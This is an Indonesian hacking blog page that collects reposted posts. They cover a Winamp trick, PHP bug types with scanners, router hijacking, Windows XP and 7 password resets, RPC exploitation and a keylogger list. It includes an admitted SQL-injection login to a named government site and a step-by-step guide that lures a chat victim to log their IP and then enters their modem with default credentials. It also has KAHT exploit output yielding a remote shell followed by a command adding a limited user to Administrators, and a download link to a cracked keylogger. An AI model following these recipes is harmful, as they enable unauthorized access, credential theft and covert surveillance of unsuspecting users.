Halaman

Select Language For You

Login

Saha Wae

free counters

Your Properties

IP
Kamis, 11 November 2010
Hasil ngehack....


Selasa, 10 Agustus 2010

Winamp Berkedip Pada Anda

Saya menemukan keanehan pada Winamp “Jagoan Player Music Pada PC Saya”, seperti “berkedip” menurut bagaimana musik itu suara besar kecilnya sepertinya :D Bassnya dech.
Caranya :
1. Seperti biasa jalankan aplikasi winamp
2. Klik Pada bagian Main Contoh :



3. Terus ketikkan N U L L S O F T dengan pelan jangan terburu-buru :D, ingat pada saat hurup L diketik pasti keluar Open File dialog, tekan aja ESC pada keyboard.
4. Coba Play musiknya berkedip-kedipkan :D


Sampai jumpa di tulisan selanjutnya.......................
Sabtu, 20 Maret 2010

PHP Security – Cek Bug PHP Script

Setelah terampungkan script php yang telah kita buat ada kalanya bug-bug yang tidak diinginkan bercokol di sela-sela script yang telah siap dionlinekan. Dan tentunya bug ini bisa berakibat fatal sehingga dapat dimanfaatkan oleh para intruder-intruder yang berusaha untuk mengekploitasi system.

Dan siapa sangka script php yang telah dibuat itu aman dari kerentanan dalam masalah security. :D ~~~

Lalu, bagaimana mencegah sang hacker mengekploitasi, bahkan merusak website anda, bagaimana mencegah secara pasti dan mengetahui script yang telah dibuat memiliki bug yang fatal, bagaimana menangani itu semua ?? :D

Sebelum kita beralih maju ke langkah selanjutnya ada baiknya untuk mengenali bug popular yang paling sering diexploitasi.

Penulis akan mencoba untuk memberikan sedikit penjelasan, bug yang sering dijumpai dalam aplikasi berbasis web khususnya Content Management system maupun yang lainnya. Di antaranya :

- XSS ( Cross Site Scripting )
- SQL Injection
- RFI ( Remote File Inclusion )

Cross Site Scriping
Lebih dikenal dengan sebutan XSS. Kesalahan ini terjadi karena tidak adanya filtering pada html maupun java script.

Tetapi pada dasarnya defacing ( perubahan kontent ) hanya terjadi disisi client saja. Yang paling fatal dari bug ini adalah anda dapat mencuri cookie kemudian menggunakannya untuk berbuat sesuatu yang … :D ~~

Contohnya :
Sensored [ maaf ]

SQL Injection
SQL Injection sebenarnya terjadi karena seorang attacker yang mencoba melakukan inject query sql melalui form ataupun via address bar pada browser internet. Sebagai contohnya ketika penulis mencoba login sebagai admin pada situs pemerintah Sumatra Selatan ( http://www.sumsel.go.id ). Dengan menggunakan query ‘ or 1=1– penulis pun berhasil login. Pada dasarnya ‘ atau single quote dan or 1=1– itu berfungsi untuk membingungkan si server sql, sehingga yang dilakukan oleh server sql adalah menjalankan query ” select * “. Yang terjadi adalah penulis diloloskan untuk login sebagai admin.

Berikut adalah gambar yang penulis capture ketika penulis berhasil login sebagai admin pada situs http://www.sumsel.go.id

Gambar ini diambil sebelum penulis mengontak webmaster via email untuk mempatch script phpnya.

RFI ( Remote File Inclusion )
Sebelumnya silahkan membaca artikel fungsi require, require_once, include, dan include_one RFI sendiri terjadi karena kesalahan programmer ketika melakukan coding, yakni menggunakan variable dalam fungsi-fungsi tersebut. Apabila user memasukkan url evil script miliknya pada variable yang digunakan dalam fungsi require ataupun include, yang terjadi adalah evil script tersebut dapat dieksekusi secara remote, dengan kata lain, attacker dapat menjalan command di server milik anda untuk merubah konten situs atau bahkan merusaknya. :D ~~

Untuk contohnya silahkan anda cari di www.milw0rm.com :D ~

Keywordnya Remote File Inclusion. :D ~

Pengecekan BUG
Pengecekan bug sendiri bisa dilakukan secara manual. Hmmm … tentunya ini akan memakan banyak waktu. Terbentuklah tools yang dapat secara cepat dan otomatis menemukan bug-bug yang terselip di php script secara tidak sengaja maupun sengaja. :D ~

Pada dasarnya untuk mengecek bug dapat dilakukan secara online maupun offline. Penulis sarankan pengecekan bug ini dilakukan di localhost anda ( offline ) saja.

Cek Bug XSS
Tools untuk mengecek XSS pada script php milik anda adalah sebuah addons mozilla firefox yang disediakan secara gratis. Penginstallannya pun tergolong mudah, berikut juga cara penggunaannya.

Tools tersebut dapat anda download disini :
http://www.securitycompass.com/exploit_me/xssme/xssme-0.2.1.xpi

Cek Bug SQL Injection
Untuk periode saat ini defacing dengan SQL Injection digolongkan paling favorit dan tentunya paling banyak digunakan, mungkin karena penyerangan yang dilakukan cukup mudah, cukup memiliki dasar pengetahuan syntax sql. Lagi-lagi sebuah addons mozilla firefox yang cukup ampuh dan mudah digunakan telah disediakan untuk melakukan cek bug sql injection. :D

Anda dapat mendownloadnya disini :
http://www.securitycompass.com/exploit_me/sqlime/sqlime-0.2.xpi

Penggunaanya pun tidak terlalu sulit.

Cek BUG Remote File Inclusion
Sebelumya anda download terlebih dahulu scriptnya disini http://www.newhack.org/dl_jump.php?id
Setelah itu silahkan download active perl, compiler interpreter ini nantinya digunakan untuk menjalankan script inclusionscanner.pl.
Dan kemudian copykan inclusionscanner.pl tersebut ke direktori c:perlbin

Langkah selanjutnya :

1. Masukkan script yang akan anda scan kedalam sebuah direktori di c:perl php.

ex : c:perlwordpress.

2. Masuk ke command prompt, start | run | cmd | enter

3. Setelah itu masuk ke direktory c:perlbin, cd c:perlbin

4. Jalankan scriptnya,

C:Perlbin>perl.exe inclusionscanner.pl

#Will check a directory for all includes and unsets

#Coded by Ironfist (ironsecurity.nl)

#Usage: create a folder in your perlfolder and put the files to be scanned in it

, next type the folder name below (eg myfolder)

#GIVES ERRORS WHEN CHECKING SUBFOLDERS: IGNORE THEM :)

Directory to read? c:perlwp

kemudian lihat hasilnya di c:perlbinresult.html

berikut hasil scan ketika penulis mencoba untuk melakukan cek inclusion pada wordpress-2.3.3 :

FOUND: require_once($locale_file);
in c:perlwp/wp-settings.php FOUND: require_once($import_root . ‘/’ . $file);
in c:perlwp/wp-admin/import.php FOUND: include_once($this->PluginDir . “class-smtp.php”);
in c:perlwp/wp-includes/class-phpmailer.php FOUND: include($lang_path.’phpmailer.lang-’.$lang_type.’.php’);
in c:perlwp/wp-includes/class-phpmailer.php FOUND: include($lang_path.’phpmailer.lang-en.php’);
in c:perlwp/wp-includes/class-phpmailer.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: include($template);
in c:perlwp/wp-includes/template-loader.php FOUND: require_once($_template_file);
in c:perlwp/wp-includes/theme.php

woww !!! :D ~~ silahkan di exploitasi eh di patch script milik anda. :D ~~

Ingat, jangan merusak, jangan berbuat vandal, jika anda menemukan bug di situs lain seperti yang telah saya sebutkan diatas, silahkan beritahu pihak admin.greetz to : ilmuwebsite staff, member ilmuwebsite,

special for jojo and her baby.

Sumber :Here

Hacking Modem Speedy dan Penanganannya

Sebenarnya sudah lama sekali telkom mengadakan diskon besar-besaran untuk meraih pelanggan sebanyak-banyaknya. Udah dulu promosinya. :D

Sama dengan bug-bug yang lainnya, konfigurasi default akan membuat pihak luar yang tidak diinginkan seperti cracker dengan mudah mengeksploitasi secara besar-besaran sehingga memanen username dan password menjadi sesuatu yang memungkinkan sekali untuk dilakukan. Contoh bug yang buruk, yaitu username default dan password yang default.

Sebelum ngejabarin masalah teknisnya, berikut alat-alat yang diperlukan :



Browser Internet ( mau yang banyak bugnya, maupun yang sedikit bugnya )

Website dengan log system flat file ( diambil dari artikelnya Anggi J. )

Aplikasi Instant Messaging, ex : Yahoo Messenger ( Social Engineering )

Internet Password Asterisk Reveal

( http://www.nsauditor.com/freeware/downloads/IEAstRecover.exe )



Langkah Pertama

Silahkan anda baca artikel http://www.ilmuwebsite.com/detil_php_tutorial/2/_Membuat_System_LOG_dengan_FLAT_FILE/
, cara memasang log system flat file. Digunakan untuk mendapatkan alamat ip dari sang korban.



Langkah Ke Dua

Inti dari artikel ini adalah pencarian user yang akan dijadikan korban. Anda bisa menggunakan aplikasi IRC ataupun instant messaging yang lainnya. Alangkah baiknya anda menggunakan aplikasi IRC, seperti mIRC ataupun yang lainnya, karena fasilitas whois yang ada didalamnya mempermudah kita untuk segera mengetahui IP sang korban, tapi pada beberapa kasus, adakalanya user yang advanced menggunakan anonymous proxy yang tentunya menyembunyikan IP asli miliknya. Sehingga perlu teknik social engineering yang lebih ampuh lagi. Berikut ada sedikit percakapan antara seseorang sebagai intruder dengan sang korban menggunakan aplikasi yahoo messenger :



Mamang (intruder) : dah liat situs ini belom, ilmuwebsite.com ???

Sang_korban : apaan tuh ?

Mamang (intruder ) : situs keren punya orang keren, ngebahas tentang berbagai artikel mengenai kekerenan. Coba deh liat.

Sang_korban : coba, gw liat dulu. # kena!!

Mamang ) intruder ) : gimana keren kan ? eh, gw off dulu yah. C U



Situs ilmuwebsite.com tersebut, merupakan sebuah contoh situs yang anda gunakan untuk merecord ip sang korban. Anda bisa memasang log system flat file pada situs milik anda. Dengan mengusahakan sang korban tertarik untuk mengunjungi situs yang telah dipasang log system flat file.

Contoh IP yang sudah dilog dalam flat file,



Waktu: Fri, 06 Jul 2007 12:47:04 +0700 | IP asli: 125.161.2.85 | Browser: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; Win 9x 4.90) | URL: / | Referrer: | Proxy: | Koneksi:



Langkah Ketiga

Setelah mendapatkan alamat ip sang korban, yang perlu anda lakukan adalah membuka browser, kemudian pada address bar isi dengan alamat ip yang telah anda dapatkan, sebagai contoh yang saya dapatkan adalah http://125.160.#.# isikan username dengan admin dan passwordnya admin. Jika anda beruntung, anda akan langsung dihadapkan kepada halaman username ADSL dan tentunya password yang asterisk. Untuk membuka password yang asterisk, anda cukup menggunakan Internet Password Asterisk Reveal.







Penanganan

Sebenarnya dengan mengganti password yang default pun itu sudah bisa mencegah teknik seperti ini. Dan intinya password yang kuatlah yang susah untuk dimanfaatkan. Password yang kuat ini memiliki lebih dari 8 digit, dan merupakan gabungan dari angka huruf dan special character. Ex: ilmVw3851te –> bentuk lain dari ilmuwebsite



Sayangnya, telkom telah menerapkan system yang unique, sehingga account speedy tidak bisa digunakan pada jaringan telepon yang berbeda. Dan tentunya anda tidak bisa men-take over account yang sudah didapatkan. Mohon Maaf, artikel ini hanya sebagai contoh pembelajaran.

Default password untuk setiap modem :

http://www.elitehackers.info/defaultpasslist.php

// Greetz :



Special for mylovely, terima kasih infonya, ide-nya jadi makin bertambah.

Bscorpio, phii, dan ryuzaki, ninjaring, barudak STTTelematika Ciawi Bogor.

Fel_c, Mentari^, Abang Dennis the Manace

Allguys Echo Member, #khilafah, pepei dwipangga dan konco-konconya di liberationyouth.com, anak-anak saveusgue

Sumber : Here

Tekhnik Exploit Password WinXP

Kali ini saya akan mencoba untuk menjelaskan 2 teknik exploitasi pada windows XP, pertama melakukan pemanfaatan SAM files dan terakhir memanfaatkan RPC-nya Windows XP. Tekhnik kedua sebetulnya adalah kelanjutan dari artikelnya mRt di echo zine 10 yang membahas tentang Exploitasi Windows XP [pada fat32] dengan memanfaatkan sang Admin sendiri (hehuehuheue … ) dan batch file yang disisipkan di start|program|startup oleh sang kriminal :) , sedangkan kali ini yang saya bahas adalah jenis NTFS, yang tidak memiliki acces seperti pada fat32 untuk dapat menaruh batch file di folder start up nya sang Admin tersayang, sehingga apabila dipaksakan “Access Denied” adalah jawabannya. Apa akibatnya jika kita menggunakan kedua tekhnik diatas ?, yang jelas mah sama-sama buat orang seneng… heuheueehuhuehuee ! Jawab sendiri dah …

Tekhnik pertama :
Yang kita butuhkan sekarang adalah :
Petter Recovery Password yang bisa di download dari situsnya langsung http://home.eunet.no/~pnordahl/ntpasswd/bootdisk.html sekalian sama infonya aja, biasanya sudah di sediakan dalam bentuk rar yang bisa di jadikan bootdisk. Yang penulis pakai untuk experimen kali ini yaitu versi bd040818 terdapat 3 file di dalamnya yakni bd040818.bin , install.bat , rawrite2.exe .
1 buah disket kosong dan layak pakai. :) –> untuk disket boot Petter Recovery Password.
Nekatzzzz ….

Kasusnya begini, misalnya ….anggap saja kita lupa password untuk login winXP nya. : ) atau kasus yang laen aja kali ya, yang lebih menantang … hehehe. Misalnya ada rampok yang kebingungan nggak bisa login, padahal kompienya mo dijual … huehueueheue. Ada yang kesindir nggak nih ??? Udah ah bcanda mulu. Langsung aja deuh …

Langkah pertama … Setelah Petter Recovery Password di jadikan bootdisk, langsung saja booting dengan disket tersebut …
Langkah berikutnya, anda akan di tanya di drive mana SAM file berada. Tekan enter saja untuk defaultnya, setelah itu akan ditanyakan secara spesifik lagi, di direktori mana file SAM berada, biasanya untuk yang defaultnya tuh SAM file berada di /windows/system32/config, enter lagi aja untuk yang defaultnya. Setelah itu ……. Nah sampe disini anda akan di minta User mana yang ingin di ganti/hapus passwordnya. Lebih baik Administrators aja, karena yang kita lakukan saat ini kan mencari cara untuk menjadi SU di Windows XP. Biar gampang melakukan sesuatu nantinya …. hehehehe !!! Untuk eksperiment kali ini lebih baik anda membuat password Administrators menjadi blankpassword [* = blankpassword], supaya gampang nantinya, dan blankpassword merupakan pilihan terbaik dalam menggunakan Petter Password Recovery. Soalnya penulis sendiri telah belasan kali mencoba mengganti password para user dengan tetapi hanya 2 yang berhasil. Sudah ??? … siiiip, tekan ! untuk mengakhir sesi reset password, dan q untuk mengakhiri scripts tersebut. Selanjutnya anda akan di tanya kembali, ingin mengulang atau tidak. Lebih baik tidak lahhhh … Edit Completed. Catatan : Setelah menggunakan Petter Recovery Password, Windows berusaha untuk melakukan scandisk, system ne baru di acak-acak nie : ). Tunggu hingga proses scandisk selesai.
Setelah proses booting, anda akan di hadapkan dengan tampilan login yang seperti biasanya. ( Nggak menarik, hehehehe… ) Sekarang tekan ctrl+alt+del, tunggu sebentar dan kemudian tekan kembali ctrl+alt+del. Nah ada tampilan login yang clasic, seperti di windows 98 dulu. Dengan 2 textbox…

————————————————-
| Log On to Windows | x |
————————————————-
| User Name : Al-k |
| Password : ****** |
| |
| | Ok | | Cancel | | BLABLABLABLA….| |
————————————————-

Ya, bentuknya kira-kira seperti diatas … : )…
Setelah itu ganti usernamenya menjadi Administrator, passwordnya di kosongkan saja, karena sebelumnya kita telah menjadikan blankpassword pada Administrator. Ok. Jreng-jreng-jreng… sekarang anda menjadi super user kembali. Silahkan buat account untuk anda sendiri.

Tekhnik Kedua :
Tiba saatnya kita maju bersama … :D , memanfaatkan Massive RPC WinXP yang bobrok. Tekhnik kedua ini dibuat untuk para user yang memiliki acces limited. Yang dibuat kesal oleh sang admin, sehingga untuk menginstall suatu software harus minta izin dari sang Admin. :( . Yang dibutuhkan hanyalah acces untuk masuk ke command shell, dan satu tool kecil ‘kaht’ . Siap ???… buka command promptnya …

C:Documents and SettingsAl-k>net user

User accounts for \NOMATTER ------------------------------------------------------------------------------- Administrator Al-k GNU-- keluarga -- Guest HelpAssistant SUPPORT_388945a0 VUSR_NOMATTER The command completed successfully.

// Anggap saja disini Al-k adalah user yang limited// Setelah itu masuk ke direktori di mana kaht berada

D:Data+ku_>

Kemudian kita test dulu kaht-nya… bisa nggak nih kita nge-root.

D:Data+ku_>kaht 127.0.0.0 127.0.0.3_________________________________________________

KAHT II - MASSIVE RPC EXPLOIT DCOM RPC exploit. Modified by aT4r@3wdesign.es #haxorcitos && #localhost @Efnet Ownz you!!! FULL VERSION? :) - AUTOHACKING ________________________________________________

[+] Targets: 127.0.0.0-127.0.0.3 with 50 Threads [+] Attacking Port: 135. Remote Shell at port: 34522 [+] Scan In Progress... - Connecting to 127.0.0.2

Sending Exploit to a [WinXP] Server... - Conectando con la Shell Remota...

Microsoft Windows XP [Version 5.1.2600](C) Copyright 1985-2001 Microsoft Corp.

C:WINDOWSsystem32>

Tuh kan dapet deh akses rootnya. Jangan seneng dulu. Langsung aja kita buat akses user yang terbatas tadi menjadi Super User.



C:WINDOWSsystem32> net localgroup Administrators Al-k /add

The command completed successfully.



Selanjutnya anda bisa login dengan user yang baru saja dirubah accountnya tadi. Dan anda bisa login ke account user lain yang memiliki akses sama seperti Administrator, tentunya dengan menghilangkan password user tersebut dulu sebelumnya. Dan anda bisa masuk ke regedit untuk menutup perizinan user account pada control panel :

HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Policies/Explorer/DisallowCpl/

, buat string baru dengan nama 1 dan ubah valuenya menjadi nusrmgr.cpl
Dan bisa anda disable akses ke command prompt kepada semua user. Sehingga anda menjadi SU yang benar-benar otoriter. Sayangnya tekhnik yang kedua ini hanya bisa di lakukan di Windows XP Service Pack 1. : (

// Refferensi :
– Seni Tekhnik Hacking 1 [S’to]
– Echo Zine 10, Exploitasi Windows XP [mRt]
– Iseng Instink

// Greetz :
– y3dips, Lirva32, z3r0byte ( Arabic Man :) ), the_day, S’to [duuh masuk TV tuk
yang kesekian kalinya nih ???] . & Echo staff who can’t mentioned 1 by 1.
– Alumni SMAN4 Bogor & All guy’s in STTTelematika Ciawi Bogor.
– Special for Jheseecka & Melati “Mel, ini artikel ke 1 dan ke 2-nya !!! :) “
– hg_ , Fel_c, Mentari^, the aeh, zacx, Azwa, Sita, Dulleh, Ibonx, weww, Qank-qunk,
AK47-angga, ninjaring
– Allguys in #yogyafree, Echo Member, #khilafah, #pribumi, #e-c-h-o, #freebase

Sumber : Here

Koleksi 63 Keylogger Pilihan

Bagi para lamerz maniak hacking tools pasti sering mendengar keylogger. :D . Apa sih keylogger ? Keylogger merupakan tools yang pada dasarnya memiliki sebuah fungsi untuk melakukan monitoring semua akitivitas yang dilakukan oleh user pada sebuah PC. Mulai dari merekam password yang diketikan, chatting di instant messaging, program apa saja yang dijalankan oleh user, apa yang dilakukan user pada program tersebut, dan semua yang diketikkan di keyboard hingga pergerakan mouse, bahkan beberapa keylogger yang telah lama beredar mengincludekan fasilitas pengcapture layar monitor setiap 5 menit sekali, dan outputnya adalah HTML.

Ada beberapa keylogger yang cukup menarik, diantaranya ada yang dapat mengirim hasil dari monitoring aktivitas tersebut ke email sang penanam keylogger tersebut. Sehingga si penanam keylogger tersebut dapat melihat semua aktivitas yang dilakukan oleh user pada sebuah pc melalui email.
Jelas keylogger ini bersifat kontroversial seperti 2 mata pisau, positif, negatif, membangun dan menghancurkan. Tidak cukup waktu untuk mendiskusikan semua hal tersebut.
Untuk menambah koleksi hacking tools anda, :D silahkan unduh 63 keylogger terbaru yang cukup handal …

Berikut daftarnya :
1. 007 Keylogger Spy Software 3.873
2. Active Key Logger 2.4
3. Activity Keylogger 1.80.21
4. Activity Logger 3.7.2132
5. ActMon Computer Monitoring 5.20
6. Actual Spy 2.8
7. Advanced Invisible Keylogger v1.9
8. Advanced Keylogger 1.8
9. Ardamax Keylogger 2.9
10. BlazingTools Perfect Keylogger 1.68
11. Blazingtools Remote Logger v2.3
12. Data Doctor KeyLogger Advance v3.0.1.5
13. Local Keylogger Pro 3.1
14. ExploreAnywhere Keylogger Pro 1.7.8
15. Family Cyber Alert 4.06
16. Family Keylogger 2.80
17. Firewall bypass Keylogger 1.5
18. Free Keylogger 2.53
19. Ghost Keylogger 3.80
20. Golden Eye 4.5
21. Golden KeyLogger 1.32
22. Handy Keylogger 3.24 build 032
23. Home Keylogger 1.77
24. Inside Keylogger 4.1
25. iOpus Starr PC and Internet Monitor 3.23
26. iSpyNow v2.0
27. KeyScrambler 1.3.2
28. Keystroke Spy 1.10
29. KGB Keylogger 4.2
30. KGB Spy 3.84
31. LastBit Absolute Key Logger 2.5.283
32. Metakodix Stealth Keylogger 1.1.0
33. Network Event Viewer v6.0.0.42
34. OverSpy v2.5
35. PC Activity Monitor Professional 7.6.3
36. PC Spy Keylogger 2.3 build 0313
37. PC Weasel 2.5
38. Personal PC Spy v1.9.5
39. Power Spy 6.10
40. Powered Keylogger v2.2.1.1920
41. Quick Keylogger 2.1
42. Radar 1.0
43. Real Spy Monitor 2.80
44. Real Spy Monitor 2.80
45. Remote Desktop Spy 4.04
46. Remote KeyLogger 1.0.1
47. Revealer Keylogger Free 1.33
48. SC Keylogger Pro 3.2
49. Smart Keystroke Recorder Pro
50. Spector Pro 6.0.1201
51. SpyAnytime PC Spy 2.42
52. SpyBuddy 3.7.5
53. Spytech SpyAgent 6.02.07
54. Spytector 1.3.5
55 Stealth Key Logger 4.5
56. System keylogger 2.0.0
57. Tim’s Keylogger 1.0
58. Tiny Keylogger 2.0
59. Total Spy 2.7
60. Windows Keylogger 5.04
61. Win-Spy Pro 8.9.109
62. XP Advanced Keylogger 2.5
63. XPCSpy Pro version 3.01

Mohon maaf, sementara link 63 keylogger di suspend terlebih dahulu, sampai kami upload ulang semua keyloggernya ke server local, sebagai gantinya silahkan mencoba keylogger yang tidak kalah powerfull http://hotfile.com/dl/91905/3eb88a2/Beyond.Keylogger.v3.1.Multilenguaje.Incl.KeyMaker.and.Patch-DVT.rar.html

Sumber : Here

Reset Password Windows 7 Dengan Trinity Rescue Kit 3.3

Mungkin diantara kita pernah mengalami lupa password dari akun windows kita nah disini akan kita bahas mengenai bagaimana mereset password akun di windows kita. berhubung untuk crack dan reset password buat xp udah banyak, maka kita pilih windows keluaran terbaru saja yah, yakni windows 7 ultimate

Untuk tools-nya kita pake trinity rescue kit 3.3, tools ini berbasis "linux".. bersifat bootable, bisa digunakan untuk mereset password windows 7, vista, dan xp. Untuk memperolehnya bisa di download gratis di http://trinityhome.org

ok!! let's reset the p455w0rd!

1. burn iso trinity, klo males beli cd blank mending pake unetbootin aja, berfungsi untuk jadiin flashdisk temen-temen jadi bootable

2. cek user yang akan kita reset passwordnya, bisa dilihat pas halaman login windows dan ingat baik baik nama usernya. disini saya udah siapkan user yang akan kita reset bernama "aan" dengan status administrator.



3. set booting ke cd/dvd atau flashdisk melalui bios.. biasanya untuk pc keluaran terbaru sudah support booting lewat flashdisk

4. pilih menu "run trinity rescue kit 3.3 (default)



5. tekan "y" jika ada pertanyaan selama booting berjalan, sampai muncul menu shell seperti ini,

kemudian kita ketik perintah "winpass -u aan" (aan yakni user yang akan kita reset)



6. akan muncul informasi mengenai user yang ada di windows 7




7. karena kita akan mereset password, tekan 1 untuk perintah mereset password



8. yeah! password telah di reset.. silahkan coba login dengan user aan dan passwordnya biarin kosong

9. cek informasi user di control panel





yuhuuu.. cukup aman kah password windows anda?? semua kembali ke kita
moga bermanfaat buat temen temen disini..

referensi: http://trinityhome.org

by:
bl4ckz_e4gle
e-mail: bl4ckz.e4gle@gmail.com

Sumber :Here